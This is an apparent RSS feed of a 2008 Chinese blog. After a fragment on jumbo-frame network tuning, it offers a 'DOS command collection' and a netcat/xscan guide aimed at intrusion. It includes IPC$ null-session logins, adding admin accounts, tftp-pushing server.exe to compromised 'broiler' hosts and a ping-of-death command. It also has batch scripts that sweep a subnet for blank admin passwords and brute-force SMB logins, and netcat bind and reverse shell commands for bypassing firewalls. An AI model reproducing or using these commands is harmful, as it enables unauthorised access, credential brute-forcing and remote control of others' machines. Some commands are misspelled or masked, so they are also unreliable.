<P style="TEXT-INDENT: 2em">[*]以 10 或 100 Mbps 使用巨帧将导致性能变差或链接丢失。 </P>
<P style="TEXT-INDENT: 2em">[*]在交换器上配置巨帧时，对 CRC 将帧大小最多设置 4 个字节，如果使用 VLAN 或 Qos 数据包标记，则再加 4 个字节。</P>
<P style="TEXT-INDENT: 2em">简单来说，当你确定你的交换机支持Jumbo Frame的时候，且服务器和客户机都是NF的网卡，你可以试一下都调节成为9000这个数，看看效果有没有提升。理论上讲，是可以极大的提高Station和存储的IO性能。</P>
<P style="TEXT-INDENT: 2em"></P></TD></TR></TBODY></TABLE></P>
<P style="TEXT-INDENT: 2em"></P></TD></TR></TBODY></TABLE></P></div>]]></description>
	    <author><![CDATA[ し楠し]]></author>
	    <comments>http://wnnqt.blog.163.com/blog/static/4819109420084286542946</comments>
    <slash:comments>0</slash:comments>
    <guid isPermaLink="true">http://wnnqt.blog.163.com/blog/static/4819109420084286542946</guid>
    <pubDate>Wed, 28 May 2008 18:54:29 +0800</pubDate>
    <dcterms:modified>2008-05-28T18:54:29+08:00</dcterms:modified>
  </item>    
  <item>
  	<title><![CDATA[千个常用DOS命令全面收藏]]></title>	
    <link>http://wnnqt.blog.163.com/blog/static/481910942008385201339</link>
    <description><![CDATA[<div><P>千个常用DOS命令全面收藏</P>
<P>DOS命令字典..收藏 <BR>net use <A href="file://ipipc$">\\ip\ipc$</A> " " /user:" " 建立IPC空链接 <BR>net use <A href="file://ipipc$">\\ip\ipc$</A> "密码" /user:"用户名" 建立IPC非空链接 <BR>net use h: <A href="file://ipc$">\\ip\c$</A> "密码" /user:"用户名" 直接登陆后映射对方C：到本地为</P>
<P>H: <BR>net use h: <A href="file://ipc$">\\ip\c$</A> 登陆后映射对方C：到本地为H: <BR>net use <A href="file://ipipc$">\\ip\ipc$</A> /del 删除IPC链接 <BR>net use h: /del 删除映射对方到本地的为H:的映射 <BR>net user 用户名　密码　/add 建立用户 <BR>net user guest /active:yes 激活guest用户 <BR>net user 查看有哪些用户 <BR>net user 帐户名 查看帐户的属性 <BR>net localgroup ***istrators 用户名 /add 把“用户”添加到管理员中使其具</P>
<P>有管理员权限,注意：***istrator后加s用复数 <BR>net start 查看开启了哪些服务 <BR>net start 服务名　 开启服务；(如:net start telnet， net start schedule) <BR>net stop 服务名 停止某服务 <BR>net time \\目标ip 查看对方时间 <BR>net time \\目标ip /set 设置本地计算机时间与“目标IP”主机的时间同步,加</P>
<P>上参数/yes可取消确认信息 <BR>net view 查看本地局域网内开启了哪些共享 <BR>net view <A href="file://ip">\\ip</A> 查看对方局域网内开启了哪些共享 <BR>net config 显示系统网络设置 <BR>net logoff 断开连接的共享 <BR>net pause 服务名 暂停某服务 <BR>net send ip "文本信息" 向对方发信息 <BR>net ver 局域网内正在使用的网络连接类型和信息 <BR>net share 查看本地开启的共享 <BR>net share ipc$ 开启ipc$共享 <BR>net share ipc$ /del 删除ipc$共享 <BR>net share c$ /del 删除C：共享 <BR>net user guest 12345 用guest用户登陆后用将密码改为12345 <BR>net password 密码 更改系统登陆密码 <BR>netstat -a 查看开启了哪些端口,常用netstat -an <BR>netstat -n 查看端口的网络连接情况，常用netstat -an <BR>netstat -v 查看正在进行的工作 <BR>netstat -p 协议名 例：netstat -p tcq/ip 查看某协议使用情况（查看tcp/ip</P>
<P>协议使用情况） <BR>netstat -s 查看正在使用的所有协议使用情况 <BR>nbtstat -A ip 对方136到139其中一个端口开了的话，就可查看对方最近登陆的</P>
<P>用户名（03前的为用户名）-注意：参数-A要大写 <BR>tracert -参数 ip(或计算机名) 跟踪路由（数据包），参数：“-w数字”用于设</P>
<P>置超时间隔。 <BR>ping ip(或域名) 向对方主机发送默认大小为32字节的数据，参数：“-l[空格]</P>
<P>数据包大小”；“-n发送数据次数”；“-t”指一直ping。 <BR>ping -t -l 65550 ip 死亡之ping(发送大于64K的文件并一直ping就成了死亡之</P>
<P>ping) <BR>ipconfig (winipcfg) 用于windows NT及XP(windows 95 98)查看本地ip地址，</P>
<P>ipconfig可用参数“/all”显示全部配置信息 <BR>tlist -t 以树行列表显示进程(为系统的附加工具，默认是没有安装的，在安装</P>
<P>目录的Support/tools文件夹内) <BR>kill -F 进程名 加-F参数后强制结束某进程(为系统的附加工具，默认是没有安</P>
<P>装的，在安装目录的Support/tools文件夹内) <BR>del -F 文件名 加-F参数后就可删除只读文件,/AR、/AH、/AS、/AA分别表示删除</P>
<P>只读、隐藏、系统、存档文件，/A-R、/A-H、/A-S、/A-A表示删除除只读、隐藏</P>
<P>、系统、存档以外的文件。例如“DEL/AR *.*”表示删除当前目录下所有只读文</P>
<P>件，“DEL/A-S *.*”表示删除当前目录下除系统文件以外的所有文件</P>
<P>#2 二：</P>
<P>del /S /Q 目录 或用：rmdir /s /Q 目录 /S删除目录及目录下的所有子目录和</P>
<P>文件。同时使用参数/Q 可取消删除操作时的系统确认就直接删除。（二个命令作</P>
<P>用相同） <BR>move 盘符\路径\要移动的文件名　存放移动文件的路径\移动后文件名 移动文件</P>
<P>,用参数/y将取消确认移动目录存在相同文件的提示就直接覆盖 <BR>fc one.txt two.txt &gt; 3st.txt 对比二个文件并把不同之处输出到3st.txt文件</P>
<P>中，"&gt; "和"&gt; &gt;" 是重定向命令 <BR>at id号 开启已注册的某个计划任务 <BR>at /delete 停止所有计划任务，用参数/yes则不需要确认就直接停止 <BR>at id号 /delete 停止某个已注册的计划任务 <BR>at 查看所有的计划任务 <BR>at <A href="file://ip">\\ip</A> time 程序名(或一个命令) /r 在某时间运行对方某程序并重新启动计算</P>
<P>机 <BR>finger username @host 查看最近有哪些用户登陆 <BR>telnet ip 端口 远和登陆服务器,默认端口为23 <BR>open ip 连接到IP（属telnet登陆后的命令） <BR>telnet 在本机上直接键入telnet 将进入本机的telnet <BR>copy 路径\文件名1　路径\文件名2 /y 复制文件1到指定的目录为文件2，用参数</P>
<P>/y就同时取消确认你要改写一份现存目录文件 <BR>copy c:\srv.exe <A href="file://ip***$">\\ip\***$</A> 复制本地c:\srv.exe到对方的***下 <BR>cppy 1st.jpg/b+2st.txt/a 3st.jpg 将2st.txt的内容藏身到1st.jpg中生成</P>
<P>3st.jpg新的文件，注：2st.txt文件头要空三排，参数：/b指二进制文件，/a指</P>
<P>ASCLL格式文件 <BR>copy <A href="file://ip***$svv.exe">\\ip\***$\svv.exe</A> c:\ 或:copy\\ip\***$\*.* 复制对方***i$共享下的</P>
<P>srv.exe文件（所有文件）至本地C： <BR>xcopy 要复制的文件或目录树　目标地址\目录名 复制文件和目录树，用参数/Y</P>
<P>将不提示覆盖相同文件 <BR>tftp -i 自己IP(用肉机作跳板时这用肉机IP) get server.exe c:\server.exe </P>
<P>登陆后，将“IP”的server.exe下载到目标主机c:\server.exe 参数：-i指以二</P>
<P>进制模式传送，如传送exe文件时用，如不加-i 则以ASCII模式（传送文本文件模</P>
<P>式）进行传送 <BR>tftp -i 对方IP　put c:\server.exe 登陆后，上传本地c:\server.exe至主机 <BR>ftp ip 端口 用于上传文件至服务器或进行文件操作，默认端口为21。bin指用二</P>
<P>进制方式传送（可执行文件进）；默认为ASCII格式传送(文本文件时) <BR>route print 显示出IP路由，将主要显示网络地址Network addres，子网掩码</P>
<P>Netmask，网关地址Gateway addres，接口地址Interface <BR>arp 查看和处理ARP缓存，ARP是名字解析的意思，负责把一个IP解析成一个物理</P>
<P>性的MAC地址。arp -a将显示出全部信息 <BR>start 程序名或命令 /max 或/min 新开一个新窗口并最大化（最小化）运行某程</P>
<P>序或命令 <BR>mem 查看cpu使用情况 <BR>attrib 文件名(目录名) 查看某文件（目录）的属性 <BR>attrib 文件名 -A -R -S -H 或 +A +R +S +H 去掉(添加)某文件的 存档，只读</P>
<P>，系统，隐藏 属性；用＋则是添加为某属性 <BR>dir 查看文件，参数：/Q显示文件及目录属系统哪个用户，/T:C显示文件创建时</P>
<P>间，/T:A显示文件上次被访问时间，/T:W上次被修改时间 <BR>date /t 、 time /t 使用此参数即“DATE/T”、“TIME/T”将只显示当前日期和</P>
<P>时间，而不必输入新日期和时间 <BR>set 指定环境变量名称=要指派给变量的字符 设置环境变量 <BR>set 显示当前所有的环境变量 <BR>set p(或其它字符) 显示出当前以字符p(或其它字符)开头的所有环境变量 <BR>pause 暂停批处理程序，并显示出：请按任意键继续.... <BR>if 在批处理程序中执行条件处理（更多说明见if命令及变量） <BR>goto 标签 将cmd.exe导向到批处理程序中带标签的行（标签必须单独一行，且以</P>
<P>冒号打头，例如：“：start”标签） <BR>call 路径\批处理文件名 从批处理程序中调用另一个批处理程序 （更多说明见</P>
<P>call /?） <BR>for 对一组文件中的每一个文件执行某个特定命令（更多说明见for命令及变量） <BR>echo on或off 打开或关闭echo，仅用echo不加参数则显示当前echo设置 <BR>echo 信息 在屏幕上显示出信息 <BR>echo 信息 &gt;&gt; pass.txt 将"信息"保存到pass.txt文件中 <BR>findstr "Hello" aa.txt 在aa.txt文件中寻找字符串hello <BR>find 文件名 查找某文件 <BR>title 标题名字 更改CMD窗口标题名字 <BR>color 颜色值 设置cmd控制台前景和背景颜色；0＝黑、1＝蓝、2＝绿、3＝浅绿</P>
<P>、4＝红、5＝紫、6＝黄、7=白、8=灰、9=淡蓝、A＝淡绿、B=淡浅绿、C=淡红、</P>
<P>D=淡紫、E=淡黄、F=亮白 <BR>prompt 名称 更改cmd.exe的显示的命令提示符(把C:\、D:\统一改为：EntSky\ )</P>
<P>#3 三：</P>
<P>ver 在DOS窗口下显示版本信息 <BR>winver 弹出一个窗口显示版本信息（内存大小、系统版本、补丁版本、计算机名</P>
<P>） <BR>format 盘符 /FS:类型 格式化磁盘,类型:FAT、FAT32、NTFS ,例：Format D: </P>
<P>/FS:NTFS <BR>md　目录名 创建目录 <BR>replace 源文件　要替换文件的目录 替换文件 <BR>ren 原文件名　新文件名 重命名文件名 <BR>tree 以树形结构显示出目录，用参数-f 将列出第个文件夹中文件名称 <BR>type 文件名 显示文本文件的内容 <BR>more 文件名 逐屏显示输出文件 <BR>doskey 要锁定的命令＝字符<BR>doskey 要解锁命令= 为DOS提供的锁定命令(编辑命令行，重新调用win2k命令，</P>
<P>并创建宏)。如：锁定dir命令：doskey dir=entsky (不能用doskey dir=dir)；</P>
<P>解锁：doskey dir= <BR>taskmgr 调出任务管理器 <BR>chkdsk /F D: 检查磁盘D并显示状态报告；加参数/f并修复磁盘上的错误 <BR>tlntadmn telnt服务admn,键入tlntadmn选择3，再选择8,就可以更改telnet服务</P>
<P>默认端口23为其它任何端口 <BR>exit 退出cmd.exe程序或目前，用参数/B则是退出当前批处理脚本而不是cmd.exe <BR>path 路径\可执行文件的文件名 为可执行文件设置一个路径。 <BR>cmd 启动一个win2K命令解释窗口。参数：/eff、/en 关闭、开启命令扩展；更我</P>
<P>详细说明见cmd /? <BR>regedit /s 注册表文件名 导入注册表；参数/S指安静模式导入，无任何提示； <BR>regedit /e 注册表文件名 导出注册表 <BR>cacls 文件名　参数 显示或修改文件访问控制列表（ACL）——针对NTFS格式时</P>
<P>。参数：/D 用户名:设定拒绝某用户访问；/P 用户名:perm 替换指定用户的访问</P>
<P>权限；/G 用户名:perm 赋予指定用户访问权限；Perm 可以是: N 无，R 读取， </P>
<P>W 写入， C 更改(写入)，F 完全控制；例：cacls D:\test.txt /D pub 设定</P>
<P>d:\test.txt拒绝pub用户访问。 <BR>cacls 文件名 查看文件的访问用户权限列表 <BR>REM 文本内容 在批处理文件中添加注解 <BR>netsh 查看或更改本地网络配置情况</P>
<P>#4 四：</P>
<P>IIS服务命令： <BR>iisreset /reboot 重启win2k计算机（但有提示系统将重启信息出现） <BR>iisreset /start或stop 启动（停止）所有Internet服务 <BR>iisreset /restart 停止然后重新启动所有Internet服务 <BR>iisreset /status 显示所有Internet服务状态 <BR>iisreset /enable或disable 在本地系统上启用（禁用）Internet服务的重新启</P>
<P>动 <BR>iisreset /rebootonerror 当启动、停止或重新启动Internet服务时，若发生错</P>
<P>误将重新开机 <BR>iisreset /noforce 若无法停止Internet服务，将不会强制终止Internet服务 <BR>iisreset /timeout Val在到达逾时间（秒）时，仍未停止Internet服务，若指定</P>
<P>/rebootonerror参数，则电脑将会重新开机。预设值为重新启动20秒，停止60秒</P>
<P>，重新开机0秒。 <BR>FTP 命令： (后面有详细说明内容) <BR>ftp的命令行格式为:<BR>ftp －v －d －i －n －g[主机名] －v 显示远程服务器的所有响应信息。<BR>－d 使用调试方式。 <BR>－n 限制ftp的自动登录,即不使用.netrc文件。<BR>－g 取消全局文件名。 <BR>help [命令] 或 ？[命令] 查看命令说明 <BR>bye 或 quit 终止主机FTP进程,并退出FTP管理方式. <BR>pwd 列出当前远端主机目录 <BR>put 或 send 本地文件名 [上传到主机上的文件名] 将本地一个文件传送至远端</P>
<P>主机中 <BR>get 或 recv [远程主机文件名] [下载到本地后的文件名] 从远端主机中传送至</P>
<P>本地主机中 <BR>mget [remote-files] 从远端主机接收一批文件至本地主机 <BR>mput local-files 将本地主机中一批文件传送至远端主机 <BR>dir 或 ls [remote-directory] [local-file] 列出当前远端主机目录中的文件.</P>
<P>如果有本地文件,就将结果写至本地文件 <BR>ascii 设定以ASCII方式传送文件(缺省值) <BR>bin 或 image 设定以二进制方式传送文件 <BR>bell 每完成一次文件传送,报警提示 <BR>cdup 返回上一级目录 <BR>close 中断与远程服务器的ftp会话(与open对应) <BR>open host[port] 建立指定ftp服务器连接,可指定连接端口 <BR>delete 删除远端主机中的文件 <BR>mdelete [remote-files] 删除一批文件 <BR>mkdir directory-name 在远端主机中建立目录 <BR>rename [from] [to] 改变远端主机中的文件名 <BR>rmdir directory-name 删除远端主机中的目录 <BR>status 显示当前FTP的状态 <BR>system 显示远端主机系统类型 <BR>user user-name [password] [account] 重新以别的用户名登录远端主机 <BR>open host [port] 重新建立一个新的连接 <BR>prompt 交互提示模式 <BR>macdef 定义宏命令 <BR>lcd 改变当前本地主机的工作目录,如果缺省,就转到当前用户的HOME目录 <BR>chmod 改变远端主机的文件权限 <BR>case 当为ON时,用MGET命令拷贝的文件名到本地机器中,全部转换为小写字母 <BR>cd remote－dir 进入远程主机目录 <BR>cdup 进入远程主机目录的父目录 <BR>! 在本地机中执行交互shell，exit回到ftp环境,如!ls＊.zip</P>
<P>#5 五：</P>
<P>MYSQL 命令： <BR>mysql -h主机地址 -u用户名 －p密码 连接MYSQL;如果刚安装好MYSQL，超级用户</P>
<P>root是没有密码的。<BR>（例：mysql -h110.110.110.110 -Uroot -P123456 <BR>注:u与root可以不用加空格，其它也一样） <BR>exit 退出MYSQL <BR>mysql*** -u用户名 -p旧密码 password 新密码 修改密码 <BR>grant select on 数据库.* to 用户名@登录主机 identified by \"密码\"; 增</P>
<P>加新用户。（注意：和上面不同，下面的因为是MYSQL环境中的命令，所以后面都</P>
<P>带一个分号作为命令结束符） <BR>show databases; 显示数据库列表。刚开始时才两个数据库：mysql和test。</P>
<P>mysql库很重要它里面有MYSQL的系统信息，我们改密码和新增用户，实际上就是</P>
<P>用这个库进行操作。 <BR>use mysql；<BR>show tables; 显示库中的数据表 <BR>describe 表名; 显示数据表的结构 <BR>create database 库名; 建库 <BR>use 库名；<BR>create table 表名 (字段设定列表)； 建表 <BR>drop database 库名; <BR>drop table 表名； 删库和删表 <BR>delete from 表名; 将表中记录清空 <BR>select * from 表名; 显示表中的记录 <BR>mysqldump --opt school&gt;school.bbb 备份数据库：（命令在DOS的<A href="file://mysqlbin">\\mysql\\bin</A></P>
<P>目录下执行）;注释:将数据库school备份到school.bbb文件，school.bbb是一个</P>
<P>文本文件，文件名任取，打开看看你会有新发现。 <BR>win2003系统下新增命令（实用部份）： <BR>shutdown /参数 关闭或重启本地或远程主机。<BR>参数说明：/S 关闭主机，/R 重启主机， /T 数字 设定延时的时间，范围0～180</P>
<P>秒之间， /A取消开机，/M //IP 指定的远程主机。<BR>例：shutdown /r /t 0 立即重启本地主机（无延时） <BR>taskill /参数 进程名或进程的pid 终止一个或多个任务和进程。<BR>参数说明：/PID 要终止进程的pid,可用tasklist命令获得各进程的pid，/IM 要</P>
<P>终止的进程的进程名，/F 强制终止进程，/T 终止指定的进程及他所启动的子进</P>
<P>程。 <BR>tasklist 显示当前运行在本地和远程主机上的进程、服务、服务各进程的进程标</P>
<P>识符(PID)。<BR>参数说明：/M 列出当前进程加载的dll文件，/SVC 显示出每个进程对应的服务，</P>
<P>无参数时就只列出当前的进程。</P>
<P>#6 六：</P>
<P>Linux系统下基本命令： 要区分大小写 <BR>uname 显示版本信息（同win2K的 ver） <BR>dir 显示当前目录文件,ls -al 显示包括隐藏文件（同win2K的 dir） <BR>pwd 查询当前所在的目录位置 <BR>cd cd　..回到上一层目录，注意cd 与..之间有空格。cd　/返回到根目录。 <BR>cat 文件名 查看文件内容 <BR>cat &gt;abc.txt 往abc.txt文件中写上内容。 <BR>more 文件名 以一页一页的方式显示一个文本文件。 <BR>cp 复制文件 <BR>mv 移动文件 <BR>rm 文件名 删除文件，rm -a 目录名删除目录及子目录 <BR>mkdir 目录名 建立目录 <BR>rmdir 删除子目录，目录内没有文档。 <BR>chmod 设定档案或目录的存取权限 <BR>grep 在档案中查找字符串 <BR>diff 档案文件比较 <BR>find 档案搜寻 <BR>date 现在的日期、时间 <BR>who 查询目前和你使用同一台机器的人以及Login时间地点 <BR>w 查询目前上机者的详细资料 <BR>whoami 查看自己的帐号名称 <BR>groups 查看某人的Group <BR>passwd 更改密码 <BR>history 查看自己下过的命令 <BR>ps 显示进程状态 <BR>kill 停止某进程 <BR>gcc 黑客通常用它来编译C语言写的文件 <BR>su 权限转换为指定使用者 <BR>telnet IP telnet连接对方主机（同win2K），当出现bash$时就说明连接成功。 <BR>ftp ftp连接上某服务器（同win2K） </P>
<P>附：批处理命令与变量</P>
<P>1：for命令及变量 基本格式： <BR>FOR /参数 %variable IN (set) DO command [command_parameters] %variable:</P>
<P>指定一个单一字母可替换的参数，如：%i ，而指定一个变量则用：%%i ，而调用</P>
<P>变量时用：%i% ，变量是区分大小写的（%i 不等于 %I）。<BR>批处理每次能处理的变量从%0—%9共10个，其中%0默认给批处理文件名使用，%1</P>
<P>默认为使用此批处理时输入的的第一个值，同理：%2—%9指输入的第2-9个值；例</P>
<P>：net use <A href="file://ipipc$">\\ip\ipc$</A> pass /user:user 中ip为%1,pass为%2 ,user为%3</P>
<P>(set):指定一个或一组文件，可使用通配符，如：(D:\user.txt)和(1 1 254)(1 </P>
<P>-1 254),{ “(1 1 254)”第一个"1"指起始值，第二个"1"指增长量，第三</P>
<P>个"254"指结束值，即：从1到254；“(1 -1 254)”说明：即从254到1 }</P>
<P>command：指定对第个文件执行的命令，如：net use命令；如要执行多个命令时</P>
<P>，命令这间加：&amp; 来隔开<BR>command_parameters：为特定命令指定参数或命令行开关</P>
<P>IN (set)：指在(set)中取值；DO command ：指执行command</P>
<P>参数：/L 指用增量形式{ (set)为增量形式时 }；/F 指从文件中不断取值，直到</P>
<P>取完为止{ (set)为文件时，如(d:\pass.txt)时 }。 <BR>用法举例： <BR>@echo off <BR>echo 用法格式：test.bat *.*.* &gt; test.txt </P>
<P>for /L %%G in (1 1 254) do echo %1.%%G &gt;&gt;test.txt &amp; net use <A href="file://%1.%%G">\\%1.%%G</A></P>
<P><BR>/user:***istrator | find "命令成功完成" &gt;&gt;test.txt <BR>存为test.bat 说明：对指定的一个C类网段的254个IP依次试建立***istrator密</P>
<P>码为空的IPC$连接，如果成功就把该IP存在test.txt中。</P>
<P>/L指用增量形式（即从1-254或254-1）；输入的IP前面三位：*.*.*为批处理默认</P>
<P>的 %1；%%G 为变量(ip的最后一位）；&amp; 用来隔开echo 和net use 这二个命令；</P>
<P>| 指建立了ipc$后，在结果中用find查看是否有"命令成功完成"信息；%1.%%G 为</P>
<P>完整的IP地址；(1 1 254) 指起始值，增长量，结止值。 <BR>@echo off <BR>echo 用法格式：ok.bat ip <BR>FOR /F %%i IN (D:\user.dic) DO smb.exe %1 %%i D:\pass.dic 200 <BR>存为：ok.exe 说明：输入一个IP后，用字典文件d:\pass.dic来暴解d:\user.dic</P>
<P>中的用户密码，直到文件中值取完为止。%%i为用户名；%1为输入的IP地址（默认</P>
<P>）。<A href="http://www.jz5u.com">http://www.jz5u.com</A></P>
<P>#7 七：</P>
<P>2：if命令及变量 基本格式： <BR>IF [not] errorlevel 数字 命令语句 如果程序运行最后返回一个等于或大于指</P>
<P>定数字的退出编码，指定条件为“真”。<BR>例：IF errorlevel 0 命令 指程序执行后返回的值为0时，就值行后面的命令；</P>
<P>IF not errorlevel 1 命令指程序执行最后返回的值不等于1，就执行后面的命令</P>
<P>。<BR>0 指发现并成功执行（真）；1 指没有发现、没执行（假）。 <BR>IF [not] 字符串1==字符串2 命令语句 如果指定的文本字符串匹配（即：字符串</P>
<P>1 等于 字符串2），就执行后面的命令。<BR>例：“if "%2%"=="4" goto start”指：如果输入的第二个变量为4时，执行后面</P>
<P>的命令（注意：调用变量时就%变量名%并加" "） <BR>IF [not] exist 文件名 命令语句 如果指定的文件名存在，就执行后面的命令。<BR>例：“if not nc.exe goto end”指：如果没有发现nc.exe文件就跳到":end"标</P>
<P>签处。 <BR>IF [not] errorlevel 数字 命令语句 else 命令语句或 IF [not] 字符串1==字</P>
<P>符串2 命令语句 else 命令语句或 IF [not] exist 文件名 命令语句 else 命令</P>
<P>语句 加上：else 命令语句后指：当前面的条件不成立时，就指行else后面的命</P>
<P>令。注意：else 必须与 if 在同一行才有效。 当有del命令时需把del命令全部</P>
<P>内容用&lt; &gt;括起来，因为del命令要单独一行时才能执行，用上&lt; &gt;后就等于是单独</P>
<P>一行了；例如：“if exist test.txt. &lt;del test.txt.&gt; else echo </P>
<P>test.txt.missing ”，注意命令中的“.” <BR></P></div>]]></description>
	    <author><![CDATA[ し楠し]]></author>
	    <comments>http://wnnqt.blog.163.com/blog/static/481910942008385201339</comments>
    <slash:comments>0</slash:comments>
    <guid isPermaLink="true">http://wnnqt.blog.163.com/blog/static/481910942008385201339</guid>
    <pubDate>Tue, 8 Apr 2008 17:20:13 +0800</pubDate>
    <dcterms:modified>2008-04-08T17:20:13+08:00</dcterms:modified>
  </item>    
  <item>
  	<title><![CDATA[系统外部命令]]></title>	
    <link>http://wnnqt.blog.163.com/blog/static/4819109420083845731334</link>
    <description><![CDATA[<div><P style="TEXT-INDENT: 2em"></P>
<P style="TEXT-INDENT: 2em"></P>
<BLOCKQUOTE>
<TABLE width="90%" border=0>
<TBODY>
<TR>
<TD width="100%">
<P style="TEXT-INDENT: 2em">系统外部命令(均需下载相关工具)：</P>
<P style="TEXT-INDENT: 2em">1、瑞士军刀：nc.exe</P>
<P style="TEXT-INDENT: 2em">参数说明： </P>
<P style="TEXT-INDENT: 2em">-h 查看帮助信息 </P>
<P style="TEXT-INDENT: 2em">-d 后台模式 </P>
<P style="TEXT-INDENT: 2em">-e prog程序重定向，一但连接就执行［危险］ </P>
<P style="TEXT-INDENT: 2em">-i secs延时的间隔 </P>
<P style="TEXT-INDENT: 2em">-l 监听模式，用于入站连接 </P>
<P style="TEXT-INDENT: 2em">-L 监听模式，连接天闭后仍然继续监听，直到CTR+C </P>
<P style="TEXT-INDENT: 2em">-n IP地址，不能用域名 </P>
<P style="TEXT-INDENT: 2em">-o film记录16进制的传输 </P>
<P style="TEXT-INDENT: 2em">-p[空格]端口 本地端口号 </P>
<P style="TEXT-INDENT: 2em">-r 随机本地及远程端口 </P>
<P style="TEXT-INDENT: 2em">-t 使用Telnet交互方式 </P>
<P style="TEXT-INDENT: 2em">-u UDP模式 </P>
<P style="TEXT-INDENT: 2em">-v 详细输出，用-vv将更详细 </P>
<P style="TEXT-INDENT: 2em">-w数字 timeout延时间隔 </P>
<P style="TEXT-INDENT: 2em">-z 将输入，输出关掉（用于扫锚时） </P>
<P style="TEXT-INDENT: 2em">基本用法： </P>
<P style="TEXT-INDENT: 2em">nc -nvv 192.168.0.1 80 连接到192.168.0.1主机的80端口 </P>
<P style="TEXT-INDENT: 2em">nc -l -p 80 开启本机的TCP 80端口并监听 </P>
<P style="TEXT-INDENT: 2em">nc -nvv -w2 -z 192.168.0.1 80-1024 扫锚192.168.0.1的80-1024端口 </P>
<P style="TEXT-INDENT: 2em">nc -l -p 5354 -t -e c:winntsystem32cmd.exe 绑定remote主机的cmdshell在</P>
<P style="TEXT-INDENT: 2em">remote的TCP 5354端口 </P>
<P style="TEXT-INDENT: 2em">nc -t -e c:winntsystem32cmd.exe 192.168.0.2 5354 梆定remote主机的</P>
<P style="TEXT-INDENT: 2em">cmdshell并反向连接192.168.0.2的5354端口 </P>
<P style="TEXT-INDENT: 2em">高级用法： </P>
<P style="TEXT-INDENT: 2em">nc -L -p 80 作为蜜罐用1：开启并不停地监听80端口，直到CTR+C为止 </P>
<P style="TEXT-INDENT: 2em">nc -L -p 80 &gt; c:\log.txt 作为蜜罐用2：开启并不停地监听80端口，直到</P>
<P style="TEXT-INDENT: 2em">CTR+C,同时把结果输出到c:\log.txt </P>
<P style="TEXT-INDENT: 2em">nc -L -p 80 &lt; c:\honeyport.txt 作为蜜罐用3-1：开启并不停地监听80端口，</P>
<P style="TEXT-INDENT: 2em">直到CTR+C,并把c:\honeyport.txt中内容送入管道中，亦可起到传送文件作用 </P>
<P style="TEXT-INDENT: 2em">type.exe c:\honeyport | nc -L -p 80 作为蜜罐用3-2：开启并不停地监听80端</P>
<P style="TEXT-INDENT: 2em">口，直到CTR+C,并把c:\honeyport.txt中内容送入管道中,亦可起到传送文件作用 </P>
<P style="TEXT-INDENT: 2em">本机上用：nc -l -p 本机端口 </P>
<P style="TEXT-INDENT: 2em">在对方主机上用：nc -e cmd.exe 本机IP -p 本机端口 *win2K</P>
<P style="TEXT-INDENT: 2em">nc -e /bin/sh 本机IP -p 本机端口 *linux,unix 反向连接突破对方主机的防火</P>
<P style="TEXT-INDENT: 2em">墙 </P>
<P style="TEXT-INDENT: 2em">本机上用：nc -d -l -p 本机端口 &lt; 要传送的文件路径及名称 </P>
<P style="TEXT-INDENT: 2em">在对方主机上用：nc -vv 本机IP 本机端口 &gt; 存放文件的路径及名称 传送文件</P>
<P style="TEXT-INDENT: 2em">到对方主机 </P>
<P style="TEXT-INDENT: 2em">备 注： </P>
<P style="TEXT-INDENT: 2em">| 管道命令 </P>
<P style="TEXT-INDENT: 2em">&lt; 或 &gt; 重定向命令。“&lt;”，例如：tlntadmn &lt; test.txt 指把test.txt的内容</P>
<P style="TEXT-INDENT: 2em">赋值给tlntadmn命令 </P>
<P style="TEXT-INDENT: 2em">＠ 表示执行＠后面的命令，但不会显示出来（后台执行）；例：＠dir c:\winnt </P>
<P style="TEXT-INDENT: 2em">&gt;&gt; d:\log.txt 意思是：后台执行dir，并把结果存在d:\log.txt中 </P>
<P style="TEXT-INDENT: 2em">&gt;与&gt;&gt;的区别 　"&gt;"指：覆盖；"&gt;&gt;"指：保存到(添加到）。</P>
<P style="TEXT-INDENT: 2em">如：@dir c:\winnt &gt;&gt; d:\log.txt和@dir c:\winnt &gt; d:\log.txt二个命令分别</P>
<P style="TEXT-INDENT: 2em">执行二次比较看：用&gt;&gt;的则是把二次的结果都保存了，而用：&gt;则只有一次的结果</P>
<P style="TEXT-INDENT: 2em">，是因为第二次的结果把第一次的覆盖了。</P>
<P style="TEXT-INDENT: 2em">#8 八：</P>
<P style="TEXT-INDENT: 2em">2、扫锚工具：xscan.exe</P>
<P style="TEXT-INDENT: 2em">基本格式 </P>
<P style="TEXT-INDENT: 2em">xscan -host &lt;起始IP&gt;[-&lt;终止IP&gt;] &lt;检测项目&gt; [其他选项] 扫锚"起始IP到终止</P>
<P style="TEXT-INDENT: 2em">IP"段的所有主机信息 </P>
<P style="TEXT-INDENT: 2em">xscan -file &lt;主机列表文件名&gt; &lt;检测项目&gt; [其他选项] 扫锚"主机IP列表文件</P>
<P style="TEXT-INDENT: 2em">名"中的所有主机信息 </P>
<P style="TEXT-INDENT: 2em">检测项目 </P>
<P style="TEXT-INDENT: 2em">-active 检测主机是否存活 </P>
<P style="TEXT-INDENT: 2em">-os 检测远程操作系统类型（通过NETBIOS和SNMP协议） </P>
<P style="TEXT-INDENT: 2em">-port 检测常用服务的端口状态 </P>
<P style="TEXT-INDENT: 2em">-ftp 检测FTP弱口令 </P>
<P style="TEXT-INDENT: 2em">-pub 检测FTP服务匿名用户写权限 </P>
<P style="TEXT-INDENT: 2em">-pop3 检测POP3-Server弱口令 </P>
<P style="TEXT-INDENT: 2em">-smtp 检测^TP-Server漏洞 </P>
<P style="TEXT-INDENT: 2em">-sql 检测SQL-Server弱口令 </P>
<P style="TEXT-INDENT: 2em">-smb 检测NT-Server弱口令 </P>
<P style="TEXT-INDENT: 2em">-iis 检测IIS编码/解码漏洞 </P>
<P style="TEXT-INDENT: 2em">-cgi 检测CGI漏洞 </P>
<P style="TEXT-INDENT: 2em">-nasl 加载Nessus攻击脚本 </P>
<P style="TEXT-INDENT: 2em">-all 检测以上所有项目 </P>
<P style="TEXT-INDENT: 2em">其它选项 </P>
<P style="TEXT-INDENT: 2em">-i 适配器编号 设置网络适配器, &lt;适配器编号&gt;可通过"-l"参数获取 </P>
<P style="TEXT-INDENT: 2em">-l 显示所有网络适配器 </P>
<P style="TEXT-INDENT: 2em">-v 显示详细扫描进度 </P>
<P style="TEXT-INDENT: 2em">-p 跳过没有响应的主机 </P>
<P style="TEXT-INDENT: 2em">-o 跳过没有检测到开放端口的主机 </P>
<P style="TEXT-INDENT: 2em">　 -t 并发线程数量,并发主机数量 指定最大并发线程数量和并发主机数量, 默</P>
<P style="TEXT-INDENT: 2em">认数量为100,10 </P>
<P style="TEXT-INDENT: 2em">-log 文件名 指定扫描报告文件名 (后缀为：TXT或HTML格式的文件) </P>
